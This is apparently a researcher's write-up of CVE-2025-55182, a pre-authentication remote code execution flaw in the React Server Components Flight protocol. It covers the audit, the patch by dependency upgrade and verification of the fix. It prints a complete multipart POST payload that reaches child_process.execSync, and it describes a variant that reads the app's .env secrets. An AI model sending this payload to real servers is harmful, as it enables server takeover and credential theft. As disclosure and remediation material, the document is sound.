Executive Summary

While performing a white-box security audit of a legacy internal application, I identified a critical, pre-authentication Remote Code Execution (RCE) vulnerability stemming from the unsafe deserialization of payloads within the React Server Components (RSC) transport protocol, commonly referred to as the Flight protocol. This vulnerability is tracked as CVE-2025-55182, colloquially known as React2Shell.

I have responsibly disclosed the finding and patched the application by upgrading the vulnerable dependencies (react, react-dom, and next). This post details the technical mechanics of the exploit, provides a sanitized Proof of Concept (PoC), and illustrates the remediation path.

The Technical Background: RSC Flight Protocol

React Server Components allow developers to write components that render on the server, sending a special, streamed transport format to the client rather than traditional JSON or HTML. This format, managed by the Flight protocol, allows the client-side React runtime to seamlessly merge server-rendered UI into the existing DOM.

The Insecure Deserialization Flaw The root cause of CVE-2025-55182 is the implicit trust the React Server implementation places in incoming Flight protocol payloads. The implementation fails to strictly validate the structure, type constraints, or property existence of objects received from HTTP requests.

An unauthenticated attacker can craft a malicious HTTP POST request that mimics a legitimate RSC Flight payload. When the vulnerable server attempts to deserialize this payload to route server-side function calls or update component state, the attacker gains control of internal parsing structures. By leveraging existing gadgets in the JavaScript runtime environment (such as process.mainModule.require), the attacker can achieve arbitrary code execution in the context of the server process.

Proof of Concept (PoC)

Environment: Next.js (App Router) running locally on port 4000. Tooling: Burp Suite.

Acting as the attacker, I crafted a multipart/form-data POST request. The body of this request contains a malformed Flight payload. By carefully manipulating special internal RSC keys (e.g., \_response, \_prefix, and get), I was able to escape the intended sandbox and invoke child_process.execSync.

The Malicious Payload

POST / HTTP/1.1
Host: localhost:4000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Payload Interpretation: Server Logs (Before Patch)

The server logs clearly show the successful, privileged execution of the injected JavaScript.

Screenshot 2026-03-20 at 15 05 19

Triggering RCE: Running id Using Burp Suite to send the request, the server responds with an error containing the output of the id command:.

Screenshot 2026-03-20 at 14 44 20

Post-Exploitation: Reading Secrets (cat .env)

To illustrate impact, I modified the payload to read the application’s environment variables (cat .env). This demonstrates complete compromise of sensitive configuration data.

Screenshot 2026-03-20 at 14 44 32

The Impact

This vulnerability is classified as Critical with a CVSS Base Score of 10.0. Because the flaw exists in the core transport protocol, exploitation occurs pre-authentication, bypassing all application-level routing logic and security middleware.

Successful exploitation results in full server takeover, allowing an attacker to:

  1. Read, modify, or delete sensitive data (environment variables, database contents).

  2. Achieve persistence on the underlying host.

  3. Pivot laterally within the network environment.

Remediation and Fix Verification

The most effective remediation for CVE-2025-55182 is to upgrade the vulnerable dependencies to the versions that introduce the secure, validated deserialization mechanisms in the Flight protocol.

Implementation I addressed this vulnerability by updating the following packages in package.json:

  1. React: Upgraded react and react-dom to 19.0.1.

  2. Next.js: Upgraded next to 15.0.5.

Verification

After redeploying the application with the updated packages, I attempted to resend the exact same malicious payload. The patched React runtime correctly identified the malformed object structure and refused to deserialize it safely.

Screenshot 2026-03-20 at 15 28 46

The server logs confirm that the unsafe execution path was not reached.

Screenshot 2026-03-20 at 15 05 37

Pull Request Patched Vulnerability: github.com/KoaCook/order-online-website/pull/2